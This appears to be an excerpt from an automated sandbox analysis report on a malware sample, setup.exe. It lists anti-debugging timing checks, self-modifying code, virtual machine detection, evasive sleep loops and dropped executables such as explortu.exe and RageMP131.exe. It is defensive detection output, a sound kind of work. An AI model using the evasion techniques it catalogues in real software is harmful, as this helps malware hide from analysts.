Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB050D second address: 4CB0521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 4C791087h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB0521 second address: 4CB0525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 1DCB78 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 1DCC47 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 3A8845 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 406D96 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 5ECB78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 5ECC47 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 7B8845 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 816D96 instructions caused by: Self-modifying code
Source: C:\Users\user\1000015002\b6042db502.exe Special instruction interceptor: First address: E48B54 instructions caused by: Self-modifying code
Source: C:\Users\user\1000015002\b6042db502.exe Special instruction interceptor: First address: C9E877 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Special instruction interceptor: First address: DC08F7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Special instruction interceptor: First address: DC0A08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Special instruction interceptor: First address: 2E8B54 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Special instruction interceptor: First address: 13E877 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Special instruction interceptor: First address: F695AA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Special instruction interceptor: First address: F92BC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Special instruction interceptor: First address: F707F6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Special instruction interceptor: First address: FF590E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Special instruction interceptor: First address: 51F9AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Special instruction interceptor: First address: 51FA6D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Special instruction interceptor: First address: 7415F1 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: A408F7 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: A40A08 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: BE95AA instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: C12BC6 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: BF07F6 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: C7590E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: F108F7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: F10A08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 10B95AA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 10E2BC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 10C07F6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 114590E instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04D00CA5 rdtsc 0_2_04D00CA5
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 1669 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 840 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 1024 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 1568 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Window / User API: threadDelayed 1517 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1352 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1077 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1065 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 631 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1163 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Window / User API: threadDelayed 1339 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1125
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1066
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1089
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1086
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1070
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1279
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1091
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1086
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1099
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1311
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1053
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1062
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1119
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1103
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1089
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 665
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 728
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 659
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 4264
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 686
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 687
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1103
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1097
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1116
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1140
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Window / User API: threadDelayed 1123
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 855
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 815
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 3211
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\sarra[1].exe Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe API coverage: 5.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3568 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3568 Thread sleep time: -74037s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 4408 Thread sleep count: 1669 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 4408 Thread sleep time: -3339669s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 7204 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5492 Thread sleep count: 298 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5492 Thread sleep time: -8940000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 748 Thread sleep count: 840 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 748 Thread sleep time: -1680840s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5496 Thread sleep count: 1024 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5496 Thread sleep time: -2049024s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 7212 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 4408 Thread sleep count: 1568 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 4408 Thread sleep time: -3137568s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7652 Thread sleep count: 116 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7652 Thread sleep time: -232116s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7656 Thread sleep count: 95 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7656 Thread sleep time: -190095s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7880 Thread sleep time: -56000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7632 Thread sleep count: 123 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7632 Thread sleep time: -246123s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7596 Thread sleep count: 1517 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7596 Thread sleep time: -45510000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7920 Thread sleep time: -1980000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7880 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7880 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7636 Thread sleep count: 95 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7636 Thread sleep time: -190095s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7648 Thread sleep count: 108 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7648 Thread sleep time: -216108s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7596 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7748 Thread sleep count: 1352 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7748 Thread sleep time: -2705352s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7752 Thread sleep count: 1077 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7752 Thread sleep time: -2155077s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7604 Thread sleep count: 109 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7740 Thread sleep count: 1065 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7740 Thread sleep time: -2131065s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7604 Thread sleep count: 118 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7604 Thread sleep count: 108 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7744 Thread sleep count: 631 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7744 Thread sleep time: -1262631s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7604 Thread sleep count: 114 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7756 Thread sleep count: 1163 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7756 Thread sleep time: -2327163s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 180 Thread sleep count: 1125 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 180 Thread sleep time: -2251125s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7056 Thread sleep count: 1066 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7056 Thread sleep time: -2133066s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1576 Thread sleep count: 1089 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1576 Thread sleep time: -2179089s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8188 Thread sleep count: 93 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7064 Thread sleep count: 1086 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7064 Thread sleep time: -2173086s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8188 Thread sleep count: 126 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1480 Thread sleep count: 1070 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1480 Thread sleep time: -2141070s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7060 Thread sleep count: 1279 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7060 Thread sleep time: -2559279s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8188 Thread sleep count: 67 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5688 Thread sleep count: 1091 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5688 Thread sleep time: -2183091s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5680 Thread sleep count: 1086 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5680 Thread sleep time: -2173086s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5444 Thread sleep count: 1099 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5444 Thread sleep time: -2199099s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6668 Thread sleep count: 93 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7116 Thread sleep count: 1311 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7116 Thread sleep time: -2623311s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6668 Thread sleep count: 120 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4320 Thread sleep count: 1053 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4320 Thread sleep time: -2107053s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6668 Thread sleep count: 86 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6668 Thread sleep count: 73 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6004 Thread sleep count: 1062 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6004 Thread sleep time: -2125062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7372 Thread sleep count: 1119 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7372 Thread sleep time: -2239119s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7484 Thread sleep count: 1103 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 7484 Thread sleep time: -2207103s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 1672 Thread sleep count: 95 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 2884 Thread sleep count: 1089 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 2884 Thread sleep time: -2179089s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 1672 Thread sleep count: 76 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 1672 Thread sleep count: 159 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 1672 Thread sleep count: 84 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 1672 Thread sleep count: 44 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8932 Thread sleep count: 665 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8932 Thread sleep time: -1330665s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8956 Thread sleep count: 728 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8956 Thread sleep time: -1456728s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8936 Thread sleep count: 659 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8936 Thread sleep time: -1318659s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8784 Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8928 Thread sleep count: 4264 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8928 Thread sleep time: -8532264s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8784 Thread sleep count: 177 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8944 Thread sleep count: 686 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8944 Thread sleep time: -1372686s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8940 Thread sleep count: 687 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8940 Thread sleep time: -1374687s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8784 Thread sleep count: 94 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8724 Thread sleep count: 1103 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8724 Thread sleep time: -2207103s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8684 Thread sleep count: 1097 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8684 Thread sleep time: -2195097s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8532 Thread sleep count: 129 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8688 Thread sleep count: 1116 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8688 Thread sleep time: -2233116s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8532 Thread sleep count: 161 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8532 Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8676 Thread sleep count: 1140 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8676 Thread sleep time: -2281140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8532 Thread sleep count: 69 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8680 Thread sleep count: 1123 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8680 Thread sleep time: -2247123s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe TID: 8532 Thread sleep count: 90 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8128 Thread sleep count: 855 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8128 Thread sleep time: -1710855s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 5612 Thread sleep count: 815 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 5612 Thread sleep time: -1630815s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8272 Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8888 Thread sleep count: 119 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8888 Thread sleep count: 98 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7972 Thread sleep count: 3211 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7972 Thread sleep time: -6425211s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8888 Thread sleep count: 78 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Thread sleep count: Count: 1339 delay: -10 Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E46000 FindFirstFileA,FindNextFileA, 27_2_00E46000
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E66770 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 27_2_00E66770
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00DB1F9C FindFirstFileExW, 27_2_00DB1F9C
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E5FF00 RegOpenKeyExA,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,GetSystemInfo,GlobalMemoryStatusEx,CreateToolhelp32Snapshot,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA, 27_2_00E5FF00
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: RageMP131.exe, 0000001B.00000003.2589932381.00000000014BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}DM5S
Source: MPGPH131.exe, 0000000F.00000003.2333342231.00000000010D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}L>
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RageMP131.exe, 0000001B.00000003.6774240284.0000000001694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
